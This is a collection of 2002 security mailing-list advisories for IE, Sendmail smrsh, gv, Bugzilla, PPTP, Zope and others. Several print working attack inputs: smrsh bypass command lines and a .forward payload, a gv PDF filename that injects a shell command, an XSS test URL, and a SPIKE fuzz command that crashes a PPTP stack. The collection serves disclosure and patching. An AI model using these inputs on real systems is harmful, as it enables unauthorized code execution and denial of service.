MSIE:"SaveRef" turns Zone off
MSIE:"SaveRef" turns Zone off
[digest]
MSIE: you can execute jscript in any zone by saving the reference
of "(NewWindow).location.assign".
(content after the "[exp]" section is not directly related to the flaw, so
skip it if you are in a hurry;)
[tested]MSIEv6(CN version)
{IEXPLORE.EXE file version: 6.0.2600.}
{MSHTML.DLL file version: 6.00.2600.}
Win98
[demo]
at
http://www16.brinkster.com/liudieyu/SaveRef/SaveRef-MyPage.htm
or
clik.to/liudieyu ==> SaveRef-MyPage section.
[exp]
javascript-protocol URL can cause CSS at client side, so microsoft
blocked "(NewWindow).location.assign" method(there is no other explanation
at all). but we can save the reference(mostly the same as 'pointer' in C)
of "(NewWindow).location.assign" when we can access it, then we can access
it forever -- regardless of NewWindow's zone, which means we can execute
jscript in any zone.
simple, that's all.
[BTW]
thanx to :
0. all knowledge bases
1."dror shalev", without his "Who Framed IE" demo at
http://drorshalev.brinkster.net/dev/Search
and his words, i wouldn't have discovered this flaw.(both "SaveRef" & "Who
Framed IE" hurt microsoft's heart -- OOP/COM/DCOM ;)
2."the Pull", his words at
http://home.austin.rr.com/wiredgoddess/thepull/UnorthodoxBugFinding.txt
are inspiring&practical.
[apology]
i am always late for online issues because of everything around me( one
example is my parents), but i've never been absent;)
[contact]
[EMAIL PROTECTED]
or
clik.to/liudieyu ===> "how to contact liu die yu" section
[security bulletin] SSRT2371 HP OpenVMS Potential POP server localvulnerability (fwd)
David Ahmad Symantec KeyID: 0x26005712 Fingerprint: 8D 9A B1 33 82 3D B3 D0 40 EB AB F0 1E 67 C6 1A 26 00 57 12 -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SECURITY BULLETIN REVISION: 0 Title: SSRT2371 HP OpenVMS Potential POP server local vulnerability NOTICE: There are no restrictions for distribution of this Bulletin provided that it remains complete and intact. RELEASE DATE: September 2002 SEVERITY: High SOURCE: Compaq Computer Corporation, a wholly-owned subsidiary of Hewlett-Packard Company and Hewlett-Packard Company HP Services Software Security Response Team REFERENCE: SSRT2371 PROBLEM SUMMARY This bulletin will be posted to the support website within 24 hours of release to - http://thenew.hp.com/country/us/eng/support.html Use the SEARCH IN feature box, enter SSRT2371 in the search window. SSRT2371 POP server potential vulnerability (Severity HIGH) A potential vulnerability has been reported where, under certain circumstances, a local authorized non-privileged user may gain unauthorized access to privileged files or unauthorized privileges. The report is of a potential locally exploitable file corruption issue with HP TCP/IP services for OpenVMS POP server. This problem does not exist if the POP server is disabled. VERSIONS IMPACTED HP TCP/IP services for OpenVMS version 5.3 HP TCP/IP services for OpenVMS version 5.1 HP TCP/IP services for OpenVMS version 5.0a HP TCP/IP services for OpenVMS version 4.2 RESOLUTION HP TCP/IP Services for OpenVMS V5.3 ALPHA (all supported versions of HP OpenVMS ALPHA): Install: HP TCP/IP Services for OpenVMS V5.3 ECO 1 Prerequisite : HP TCP/IP Services for OpenVMS V5.3 for HP OpenVMSALPHA Kit Name: DEC-AXPVMS-TCPIP_ECO-V0503-181-4 Kit Location: http://ftp1.support.compaq.com/patches/public/vms/axp/v7.3/tcpip/5.3/ HP TCP/IP Services for OpenVMS V5.3 VAX (all supported versions of HP OpenVMS VAX): Install:HP TCP/IP Services for OpenVMS V5.3 ECO 1 Prerequisite : HP TCP/IP Services for OpenVMS V5.3 for HP OpenVMS VAX Kit Name: DEC-VAXVMS-TCPIP_ECO-V0503-181-4 Kit Location: http://ftp1.support.compaq.com/patches/public/vms/vax/v7.3/tcpip/5.3/ Note: Please review the README file(s) for this patch prior to installation. HP TCP/IP services for OpenVMS 5.1 VAX & ALPHA*: Upgrade to HP TCP/IP Services for OpenVMS V5.3 and install ECO 1 listed above. * If you are unable to upgrade please contact your normal HP services OpenVMS support channel and request HP OpenVMS services elevate a case to TCP/IP Services for OpenVMS Support Engineering. HP TCP/IP services for OpenVMS 5.0a VAX & ALPHA: HP TCP/IP services for OpenVMS 4.2 VAX & ALPHA: Upgrade to HP TCP/IP Services for OpenVMS V5.3 and install ECO 1 listed above if possible. If upgrading is not possible, contact your normal HP services OpenVMS support channel and request HP OpenVMS services elevate a case to TCP/IP Services for OpenVMS Support Engineering. To determine if the service is enabled, execute the following command: $ tcpip show service pop Service Port ProtoProcess AddressState POP 110 TCP TCPIP$POP 0.0.0.0Enabled After completing the update, HP strongly recommends that you perform an immediate backup of your system disk so that any subsequent restore operations begin with updated software. Otherwise, you must reapply the update after a future restore operation. Also, if at some future time you upgrade your system to a later patch version, you may need to reapply the appropriate update. SUPPORT: For further information, contact HP Services. SUBSCRIBE: To subscribe to automatically receive future Security Advisories from the Software Security Response Team (SSRT) via electronic mail: http://www.support.compaq.com/patches/mailing-list.shtml REPORT: To report a potential security vulnerability with any HP or Compaq supported product, send email to: [EMAIL PROTECTED] HP and Compaq appreciate your cooperation and patience. As always, HP and Compaq urge you to periodically review your system management and security procedures. HP and Compaq will continue to review and enhance the security features of its products and work with our customers to maintain and improve the security and integrity of their systems. "HP and Compaq are broadly distributing this Security Bulletin in order to bring to the attention of users of the affected Compaq products the important security information contained in this Bulletin. HP and Compaq recommend that all users det
[BUGZILLA] Security Advisory
Bugzilla Security Advisory October 1st, 2002 All Bugzilla installations are advised to upgrade to the latest versions of Bugzilla, 2.14.4 and 2.16.1, both released today. Security issues of varying importance have been fixed in both. These vulnerabilities affect all previous 2.14 and 2.16 releases. 2.14.x users are additionally encouraged to upgrade to 2.16.1 as soon as possible, as the 2.14 branch will no longer be maintained by the Bugzilla team beyond the end of this year. Individual patches to upgrade Bugzilla are available at http://ftp.mozilla.org/pub/webtools/ (however these patches are only valid for 2.14.3 and 2.16 users). Full release downloads and CVS upgrade instructions are available at http://www.bugzilla.org/download.html Complete bug reports for all the following bugs may be obtained at http://bugzilla.mozilla.org/ The following security issues were fixed in both 2.14.4 and 2.16.1: - Permissions leak when using "usebuggroups" and more than 47 groups; permissions are granted to users in higher groups when they shouldn't be. (bug 167485; comment 12 has additional detection/recovery information) http://bugzilla.mozilla.org/show_bug.cgi?id=167485#c12 - bugzilla_email_append.pl calls processmail insecurely; command injection possible. (bug 163024) The following additional security issue was fixed in 2.16.1: - Apostrophes are not properly handled during account creation; SQL injection possible. (bug 165221) General information about the Bugzilla bug-tracking system can be found at http://www.bugzilla.org/ Comments and follow-ups can be directed to the netscape.public.mozilla.webtools newsgroup or the mozilla-webtools mailing list; http://www.mozilla.org/community.html has directions for accessing these forums. -- Dave Miller Project Leader, Bugzilla Bug Tracking System Lead Software Engineer/System Administrator, Syndicomm Online http://www.syndicomm.com/http://www.bugzilla.org/
XSS bug in Compaq Insight Manager Http server
Advisory name: XSS bug in Compaq Insight Manager Http server
Application: Compaq Insight Manager Http server
Date: 01.10.2002
Impact: XSS code execution
[DESCRIPTION]
XSS bug in Compaq Insight Manager Http server
[ISSUE]
The Compaq Insight Manager Http server is vulnerable to the Cross Site
Scripting (XSS) vulnerability. This vulnerability is caused by the
results returned to a user when a non-existing file is requested. The
vulnerability would allow an attacker to make the server present another
user with malicious JavaScript/HTML code that is interpreted and
executed without the users knowledge (e.g. the result contains the
JavaScript provided in the request). This vulnerability was identified
with a popular open-source vulnerability assessment tool and confirmed
using the following XSS test.
[XSS TEST]
http://:2301/alert('Test')
[VERSIONS TESTED]
CompaqHTTPServer/4.2
CompaqHTTPServer/4.37
[SUPPORTING INFO]
http://www.cert.org/advisories/CA-2000-02.html
[VENDOR RESPONSE]
There is a 3rd party software tool that can be used for security
assessments that flags any web server as potentially having this
problem. Our web servers do not, to our knowledge, have this
vulnerability. We have investigated it but it is a non-issue for us.
This issue is just a 'potential vulnerability' rather than a 'for sure'
problem. In other words, the tool is guessing that all web servers can
have this problem.
Thank You,
HP E-Services
iDEFENSE Security Advisory 10.01.02: Sendmail smrsh bypass vulnerabilities
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
iDEFENSE Security Advisory 10.01.02
Sendmail smrsh bypass vulnerabilities
DESCRIPTION
It is possible for an attacker to bypass the restrictions imposed by
The Sendmail Consortiums Restricted Shell (SMRSH) and execute a
binary of his choosing by inserting a special character sequence into
his .forward file. SMRSH is an application intended as a replacement
for sh for use in Sendmail. There are two attack methods both of
which are detailed below.
METHOD ONE
This method takes advantage of the application's implementation of
the
'||' command. The process is best explained with an example:
$ echo "echo unauthorized execute" > /tmp/unauth
$ smrsh -c ". || . /tmp/unauth || ."
/bin/sh: /etc/smrsh/.: is a directory
unauthorized execute
/tmp/unauth is executed despite the fact that it is not located in
the SMRSH restricted directory /etc/smrsh. This happens because SMRSH
first checks for '.', which exists, and does no further verification
on the files listed after '||'. The same attack would look like the
following in the attackers .forward file:
"| . \|| . /tmp/unauth \|| ."
METHOD TWO
This method takes advantage of the following routine from smrsh.c:
/* search backwards for last / (allow for 0200 bit) */
while (cmd > q)
{
if ((*--cmd & 0177) == '/')
{
cmd++;
break;
}
}
It is possible to feed SMRSH a command line that will be internally
converted to a space thereby bypassing all filters, yet will still
execute. Examples of these include:
smrsh -c "/ command"
smrsh -c "../ command"
smrsh -c "./ command"
smrsh -c "././ command"
The listed routine will convert any of the above examples to a space.
However, when the following execle() call is reached:
(void) execle("/bin/sh", "/bin/sh", "-c", newcmdbuf, NULL, newenv);
SMRSH will execute:
/bin/sh -c command
Notice that despite the double space command will still execute.
The .forward variation of this attack works the same way.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2002-1165 to this issue.
ANALYSIS
The following are required conditions for successful and meaningful
exploitation of this vulnerability:
- - - The target system must be utilizing SMRSH.
- - - The attacker must have a valid local account on the system.
- - - In method one the attacker must be able to create files.
While this exploit obviously removes the restrictions imposed by
SMRSH it also allows users to execute programs on systems that they
do not have shell access to. Utilizing either of the above-described
methods, an attacker who can modify his own .forward file can execute
arbitrary commands on the target system with the privileges of his
own account. Systems that forbid shell access generally do not have
tightened local security, the ability to execute arbitrary commands
through the SMRSH vulnerablity opens the target system to local
privilege escalation attacks that otherwise would not be possible.
DETECTION
The latest versions of SMRSH are vulnerable. Including the version
packaged with Sendmail 8.12.6 and Sendmail 8.11.6-15 (default install
of Redhat 7.3). Older versions of SMRSH do not appear to be
vulnerable (8.11 5/19/1998). The version of SMRSH available at
ftp://ftp.uu.net/pub/security/smrsh is also not vulnerable.
WORKAROUND
Sendmail.org has provided a patch addressing the above-described
issues.
The patch is available for download at
http://www.sendmail.org/patches/smrsh-20020924.patch.
VENDOR FIX/RESPONSE
Sendmail.org's official comment:
"We would like to thank iDEFENSE, zen-parse, and Pedram Amini for
bringing these problems to our attention.
If you actually use a vulnerable smrsh version (which can be tested
according to the descriptions given before), please apply the patch
that has been made available. To figure out whether your
configuration
uses smrsh, check your sendmail.mc file, i.e., look for
FEATURE(`smrsh')
and check your sendmail.cf file (usually located in /etc/mail or
/etc):
grep '^Mprog.*smrsh' sendmail.cf
Also consider whether you actually need this feature, e.g., if you
make procmail available to your users then smrsh is basically
useless."
DISCLOSURE TIMELINE
9/1/2002 Disclosed to iDEFENSE
9/24/2002 Disclosed to [EMAIL PROTECTED]
9/24/2002 Disclosed to iDEFENSE clients
9/24/2002 Response from Greg Shapiro [EMAIL PROTECTED]
9/25/2002 Coordination from Claus Assmann [EMAIL PROTECTED]
10/1/2002 Public Coordinated Disclosure
CREDIT
Method One was exclusively disclosed to iDEFENSE by zen-parse
([EMAIL PROTECTED])
Method Two was discovered during the verification process by Pedram
Amini ([EMAIL PROTECTED])
Get paid for security research
http://www.idefense.com/contributor.html
Subscribe to iDEFENSE Advisories:
send email to [EMAIL PROTECTED], subject line: "subscribe"
- -dave
David Endler, CISSP
Director,
Re: Another possible RFC 2046 vulnerability.
On September 27, 2002 at 13:01, Jose Marcio Martins da Cruz wrote: > What's interesting is that in this case the message and the malicious > code passes through two different network paths : messages is sent by > mail and the malicious code will be get by receiver by anonymous ftp. > > In the case of previous vulnerability (fragmented message), message and > malicious code uses the same network path. > > Classical mail server virus scanners will never see the malicious code > pass through it, as they will never have available entire malicious > code. Since the external-body type uses other standard network protocols, then the security policies of a company for other protocols (like ftp) would take effect. It is no different than if someone sends a message to someone saying "go download ftp://";. > I can't say anything about others mail clients, as I'm sick at home and > I have no access to other MUAs. The venerable MH, and its successor nmh, support the message/external-body type. The only real security risk is if a badly designed MUA automatically retrieves the data specified in a message/external-body (and RFC 2046 gives a warning about this). Otherwise, it poses the same security problems as someone including a URL in a regular mail message (which many MUAs automatically convert into a hyperlink). --ewh P.S. You may be interested in RFC 2017 that defines the URL access type for message/external-body.
GLSA: unzip
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - GENTOO LINUX SECURITY ANNOUNCEMENT - - PACKAGE :unzip SUMMARY :directory-traversal vulnerability DATE :2002-10-01 10:30 UTC - - OVERVIEW Archive extraction is usually treated by users as a safe operation. There are few problems with files extraction though. DETAIL Among them: huge files with high compression ratio are able to fill memory/disk (see "Antivirus scanner DoS with zip archives" thread on Vuln-Dev), special device names and special characters in file names, directory traversal (dot-dot bug). Probably, directory traversal is most dangerous among this bugs, because it allows to craft archive which will trojan system on extraction. This problem is known for software developers, and newer archivers usually have some kind of protection. But in some cases this protection is weak and can be bypassed. I did very quick (approx. 30 minutes, so may be I've missed something) researches on few popular archivers. Results are below. Read the full advisory at http://marc.theaimsgroup.com/?l=bugtraq&m=99496364810666&w=2 SOLUTION It is recommended that all Gentoo Linux users who are running app-arch/unzip-5.42-r1 and earlier update their systems as follows: emerge rsync emerge unzip emerge clean - - [EMAIL PROTECTED] - GnuPG key is available at www.gentoo.org/~aliz - - -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.7 (GNU/Linux) iD8DBQE9mXsMfT7nyhUpoZMRAmE2AJ42IOteK6437umkllOR4F0oJO0a4ACfY4QU u5jofs44arhh9ZKkAmPxv2A= =myfe -END PGP SIGNATURE-
PPTP
For those of you who have a desire to crash Microsoft's PPTP stack, I have a pptp .spk script linked off of http://www.immunitysec.com/spike.html. It would probably be good to run against other PPTP stacks as well. (Likewise, SPIKE's msrpcfuzzer takes down free software dce-rpc stacks just as fast as it takes down the non-free stacks.) It's not a bad demonstration of how to use SPIKE scripts either, if you're inclined to learn. Finding this bug took less than thirty minutes...() To run it: # first enable the shared library fun bash$ . ./ls.sh # now run the script against 192.168.1.100 after setting up PPTP on that machine. It's a good idea to set up SoftIce as well. bash$ ./generic_send_tcp 192.168.1.100 1723 ./pptp.spk 0 0 #wait for crash. It's in the second packet, I believe. Dave Aitel Immunity, Inc. References - [1] phion Information Technologies http://www.phion.com/ Exploit - phion Information Technologies will not provide an exploit for this issue. :> signature.asc Description: This is a digitally signed message part
Postnuke XSS patch
[For Immediate Release] The PostNuke Security Officer has updated the CVS version of Postnuke and a patch will be made available today to fix the outstanding issue shown here http://marc.theaimsgroup.com/?l=bugtraq&m=103306696427569&w=2 It is apparent that the Postnuke developers reviewed the material suggested vulnerable and deemed it worthy of a patch. Please refer to their website for patch availability, as I was not provided a specific URL to point you to. -- Mark Grimes <[EMAIL PROTECTED]> Stateful Labs
NETGEAR FVS318 Information Disclosure
Hi All.. I'm resending this..*without* the failure notice ;) Attached is an Advisory concerning Netgear's FVS318 Firewall/VPN/Router, and the fact that it stores Usernames and Passwords in plain text if the config is backed up. Thanks, [EMAIL PROTECTED] http://www.aisec.net Information Security Team. -=-=-=-=-=-=-=-=-=-=-=-=-=- === AIS advisory # 0006 NETGEAR FVS318 Firewall Router Firmware 1.1 Username/Password Disclosure ==Summary Netgear's FVS318 Firewall/VPN/Router stores Usernames and Passwords in plain text when a backup of the configuration is made. ==Software Affected== Netgear FVS318 firmware 1.1 and every firmware version before it. ===Vendor http://www.netgear.com =Product Description= Taken from their site : http://www.netgear.com "Want the utmost in network security for your office? NETGEAR's FVS318 ProSafe VPN Firewall provides business-class protection at a NAT router price. This completely equipped, broadband-capable Virtual Private Network (VPN) firewall is a true firewall and provides it all - Denial of Service (DoS) protection and Intrusion Detection using Stateful Packet Inspection (SPI), URL access and content filtering, logging, \reporting, and real-time alerts. It initiates up to 8 IPSec VPN tunnels simultaneously, reducing your operating costs and maximizing the security of your network. With 8 auto-sensing, Auto UplinkT switched LAN ports and Network Address Translation (NAT) routing, up to 253 users can access your broadband connection at the same time." Vulnerability The web interface includes a backup option to store your current config just in case anything happens For the most part, the file isn't readable except for a few words, in particular, your Username to your ISP internet connection, and the password to the web admin interface which listens on port 80 by default. This port can be changed to whatever you like, but probably not many people do that. I would consider this a local threat because you can only get to the web interface from inside the local LAN. Unless you enable Remote Management, which listens on port 8080 by default. The default username for the web interface can't be changed, it's always "admin"... Any good admin makes a backup of their working configs ;) FIX (if any) Use PGP to encrypt your files, if Netgear doesn't encrypt them for you. Discovered by [EMAIL PROTECTED] http://www.aisec.net Information Security Team
[CLA-2002:527] Conectiva Linux Security Announcement - python
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- CONECTIVA LINUX SECURITY ANNOUNCEMENT - -- PACKAGE : python SUMMARY : os.execvpe() vulnerability DATE : 2002-10-01 11:48:00 ID: CLA-2002:527 RELEVANT RELEASES : 6.0, 7.0, 8 - - DESCRIPTION Python is an interpreted, interactive, object-oriented programming language. Zack Weinberg found[1] a vulnerability in the way the exevpe() method from the os.py module uses a temporary file name. A file which supposedly should not exist is created in a unsafe way and the method tries to execute it. The objective of such code is to discover what error the operating system returns in a portable way. This vulnerability affects all python versions and is fixed[2,3] in the python CVS repository (using a better approach). By exploiting this vulnerability a local attacker can execute arbitrary code with the privileges of the user running python code which uses the execvpe() method. SOLUTION All python users should upgrade. REFERENCES: 1.http://mail.python.org/pipermail/python-dev/2002-August/027223.html 2.http://python.org/sf/590294 3.http://python.org/sf/601077 4.http://distro.conectiva.com.br/bugzilla/show_bug.cgi?id=6595&idioma=en DIRECT DOWNLOAD LINKS TO THE UPDATED PACKAGES ftp://atualizacoes.conectiva.com.br/6.0/RPMS/python-1.5.2-14U60_2cl.i386.rpm ftp://atualizacoes.conectiva.com.br/6.0/RPMS/python-devel-1.5.2-14U60_2cl.i386.rpm ftp://atualizacoes.conectiva.com.br/6.0/RPMS/python-doc-1.5.2-14U60_2cl.i386.rpm ftp://atualizacoes.conectiva.com.br/6.0/RPMS/python-idle-1.5.2-14U60_2cl.i386.rpm ftp://atualizacoes.conectiva.com.br/6.0/RPMS/tkinter-1.5.2-14U60_2cl.i386.rpm ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/python-1.5.2-14U60_2cl.src.rpm ftp://atualizacoes.conectiva.com.br/7.0/RPMS/python-2.1-15U70_1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/7.0/RPMS/python-devel-2.1-15U70_1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/7.0/RPMS/python-doc-2.1-15U70_1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/7.0/RPMS/python-freeze-2.1-15U70_1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/7.0/RPMS/python-idle-2.1-15U70_1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/7.0/RPMS/python-tkinter-2.1-15U70_1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/python-2.1-15U70_1cl.src.rpm ftp://atualizacoes.conectiva.com.br/8/RPMS/python-2.2-10U80_1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/8/RPMS/python-devel-2.2-10U80_1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/8/RPMS/python-doc-2.2-10U80_1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/8/RPMS/python-freeze-2.2-10U80_1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/8/RPMS/python-idle-2.2-10U80_1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/8/RPMS/python-tkinter-2.2-10U80_1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/8/SRPMS/python-2.2-10U80_1cl.src.rpm ADDITIONAL INSTRUCTIONS Users of Conectiva Linux version 6.0 or higher may use apt to perform upgrades of RPM packages: - add the following line to /etc/apt/sources.list if it is not there yet (you may also use linuxconf to do this): rpm [cncbr] ftp://atualizacoes.conectiva.com.br 6.0/conectiva updates (replace 6.0 with the correct version number if you are not running CL6.0) - run: apt-get update - after that, execute: apt-get upgrade Detailed instructions reagarding the use of apt and upgrade examples can be found at http://distro.conectiva.com.br/atualizacoes/#apt?idioma=en - - All packages are signed with Conectiva's GPG key. The key and instructions on how to import it can be found at http://distro.conectiva.com.br/seguranca/chave/?idioma=en Instructions on how to check the signatures of the RPM packages can be found at http://distro.conectiva.com.br/seguranca/politica/?idioma=en - - All our advisories and generic update instructions can be viewed at http://distro.conectiva.com.br/atualizacoes/?idioma=en - - subscribe: [EMAIL PROTECTED] unsubscribe: [EMAIL PROTECTED] -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE9mbaw42jd0JmAcZARAhb6AJ9Uk2m4U9DW1SV/Ed4hMsj1Gge+SwCfevxF C8XCFcdvnkSvmNyxRSI88FU= =J9Ma -END PGP SIGNATURE-
GLSA: fetchmail
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - GENTOO LINUX SECURITY ANNOUNCEMENT - - PACKAGE:fetchmail SUMMARY:remote vulnerabilities DATE :2002-10-01 09:30 UTC - - OVERVIEW Stefan Esser from e-matters has discovered several buffer overflows and a broken boundary check within Fetchmail. DETAIL If Fetchmail is running in multidrop mode these flaws can be used by remote attackers to crash it or to execute arbitrary code with the permissions of the user running fetchmail. Depending on the configuration this allows a remote root compromise. Read the full advisory at http://security.e-matters.de/advisories/032002.html SOLUTION It is recommended that all Gentoo Linux users who are running net-mail/fetchmai-0.59.14 and earlier update their systems as follows: emerge rsync emerge fetchmail emerge clean - - [EMAIL PROTECTED] - GnuPG key is available at www.gentoo.org/~aliz - - -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.7 (GNU/Linux) iD8DBQE9mW3bfT7nyhUpoZMRAj24AJ4v6eTU4W0kFymRqxVhVm+pzLzqvACcCLP0 X1kl66YrBuEJozTTNzpwhAg= =9mUU -END PGP SIGNATURE-
Insecure XML-RPC handling in Zope reveals the distribution physic al location.
Zope versions pre 2.5.1b2 do not handle correct some XML-RPC request. 1. Summary: Zope (www.zope.org) will reveal the complete physical location where the server and its components are installed if it receives "incorrect" XML-RPC requests. In some cases it will reveal also information about the serves in the protected LAN (10.x.x.x for example) on which current server is relaying. 2. Details: A request like the quoted below will cause Zope to produce stack traces in the response that will reveal the information mentioned above. See http://collector.zope.org/Zope/359 for more details. Ironically the quoted request was an example how to use XML-RPC. Note that starting Zope without -D option won't stop the exposure. telnet localhost 8080 POST /Documentation/comp_tut HTTP/1.0 Host: localhost Content-Type: text/xml Content-length: 93 objectIds 3. Vulnerable versions: Zope 2.3.2 - Yes (earlier versions ware not tested) Zope 2.4.1 (Stable) - Yes Zope 2.5.0 (Stable) - Yes Zope 2.5.1 (Stable) - Yes Zope 2.5.1b2 (Development) - Not Zope 2.6.0b1 (Development) - Not 4. Solution: Upgrade to 2.6.0b1 (Development) if possible. 5. Vendor information Notification was send to the vendor on March 22, 2002 The issue was officially resolved on Aug 29, 2002 but only in v2.6.0. Regards, Rossen Raykov --- Rossen Raykov COGNICASE U.S.A. Inc. (908) 860-1100 Ext. 1140 [EMAIL PROTECTED]
ASA-0000: GV Execution of Arbitrary Shell Commands
"After" Security Advisory
Title: GV Execution of Arbitrary Shell Commands
Affects: gv-3.5.8 and probably older versions
Advisory ID: ASA-
Release Date: 2002-10-01
Author: Marc Bevand
URL: http://www.epita.fr/~bevand_m/asa/asa-
--oOo-- 0. Table of Contents
0. Table of Contents
1. Introduction
2. Problem
3. Solution
4. Conclusion
5. References
6. Attached files
--oOo-- 1. Introduction
GV [0] is a PostScript and PDF previewer available on
many unix
systems and even on some non-unix systems. Technically,
it is a user
interface for Ghostscript [1], which is a PostScript
and PDF language
interpreter. GV is also able to automatically
decompress GZip'ed [2]
files on-the-fly before reading them.
When GV detects that the document is either a PDF
file or a
GZip compressed file, it executes some commands with
the help of the
system() function. Unfortunately, these commands
contain the
filename, which can be considered as untrusted user
input. It is then
possible to distribute a file (with a meticulously
choosed filename,
that can even seems innocent) that causes execution of
arbitrary
shell commands when it is read with GV.
--oOo-- 2. Problem
GV detects PDF files or GZip compressed files by
reading the first
bytes of datas:
o when "%PDF-" is read, GV assumes it is a PDF file
and call
system() with the following argument (default value
of the
GV.gsCmdScanPDF X11 ressource):
"gs -dNODISPLAY -dQUIET -sPDFname=%s -sDSCname=%s
pdf2dsc.ps -c quit"
The 1st "%s" corresponds to the PDF filename, and
the 2nd to a
temporary filename.
o when "\037\235" or "\037\213" is read, GV assumes
it is a GZip
compressed file and call system() with the
following argument
(default value of the GV.uncompressCommand X11
ressource):
"gzip -d -c %s > %s"
The 1st "%s" corresponds to the GZip compressed
filename, and the
2nd to a temporary filename.
In these conditions, trying to open, for example, a
PDF file named
"xxx & echo hello & xxx" leads to execution of
"gs -dNODISPLAY -dQUIET -sPDFname=xxx & echo hello &
xxx ...". Thus,
"echo hello" (a part of the filename) is executed:
$ file "xxx & echo hello & xxx"
xxx & echo hello & xxx: PDF document, version 1.2
$ gv "xxx & echo hello & xxx"
--> hello
sh: xxx: command not found
GS>hello
sh: xxx..tmp: command not found
The error messages ("sh: xxx: command not found", etc)
are just
results of the garbage introduced in the system()
argument by the
unusual "xxx & echo hello & xxx" filename. Moreover, GV
displays a
dialog box explaining that execution of Ghostscript failed.
But all these "inconvenients" (from the malicious
user point-of-
view) can be easily avoided. Imagine a site where each
host access a
file server through the mount point "/sgoinfre", and
suppose that
someone (Charly) creates 2 files in this directory:
o a PDF file named 'Huhu_"`source evil`".pdf'
(doublequotes and
backquotes are part of the filename)
o a shell script named 'evil' that contains:
#!/bin/sh
echo '"`source evil`"'
touch _it_works_
Now, here is what happens if someone else (Alice) wants
to read the
PDF file:
$ cd /sgoinfre
$ gv 'Huhu_"`source evil`".pdf'
All works fine for Alice (no error messages, no dialog
box), except
that she hasn't realized that 'evil' has been executed
under her
identity:
$ ls -l _it_works_
-rw---1 alice users 0 Jul 30 05:56
_it_works_
Note: this example works only if the /bin/sh shell
executed by
system() supports the 'source' builtin; that's the case
when /bin/sh
is a link to bash.
--oOo-- 3. Solution
The GV maintainer, Johannes Plass , has been e-mailed twice
about this
problem. Unfortunately, no response has been received,
it seems that
he has stopped his work on GV since 1997.
However, I propose a temporary fix: the attached patch
("asa-.gv-3.5.8.patch"), done against GV 3.5.8,
checks if
the filename contains only allowed characters
(alphanumeric and
``+,-./:=@\^_''). If this is not the case, an error
message is
displayed and system() is not called.
--oOo-- 4. Conclusion
GV contains a security hole allowing execution of
arbitrary shell
commands. Since the author seems to have stopped his
work on GV, a
temporary fix has been developped: see the attached
patch done
against GV 3.5.8.
--oOo-- 5. References
[0] GV
http://wwwthep.physik.uni-mainz.de/~plass/gv/
[1] Ghostscript
http://www.cs.wisc.edu/~ghost/index.html
[2] GNU Zip
http://www.gzip.org
--oOo-- 6. Attached files
The following file is also available at:
http://www.epita.fr/~bevand_m/asa/asa-.gv-3.5.8.patch
---8<-- asa-.gv-3.5.8.patch
-
diff -ur
GLSA: tar
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - GENTOO LINUX SECURITY ANNOUNCEMENT - - PACKAGE :tar SUMMARY :directory-traversal vulnerability DATE :2002-10-01 12:30 UTC - - OVERVIEW The tar utility contain vulnerabilities which can allow arbitrary files to be overwritten during archive extraction. DETAIL During testing by Redhat of the fix to GNU tar from the advisory below, it was discovered that GNU tar 1.13.25 was still vulnerable to a modified version of the same problem. Read the full original advisory at http://marc.theaimsgroup.com/?l=bugtraq&m=99496364810666&w=2 SOLUTION It is recommended that all Gentoo Linux users who are running sys-apps/tar-1.13.25-r2 and earlier update their systems as follows: emerge rsync emerge tar emerge clean - - [EMAIL PROTECTED] - GnuPG key is available at www.gentoo.org/~aliz - - -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.7 (GNU/Linux) iD8DBQE9mZcbfT7nyhUpoZMRAgTqAJ9TIgnwCf6vABCsQp7fZ/WpHUoCNACdGzJH 2yxb1ASJvjfl5ToRzzfJ8oM= =7aPP -END PGP SIGNATURE-
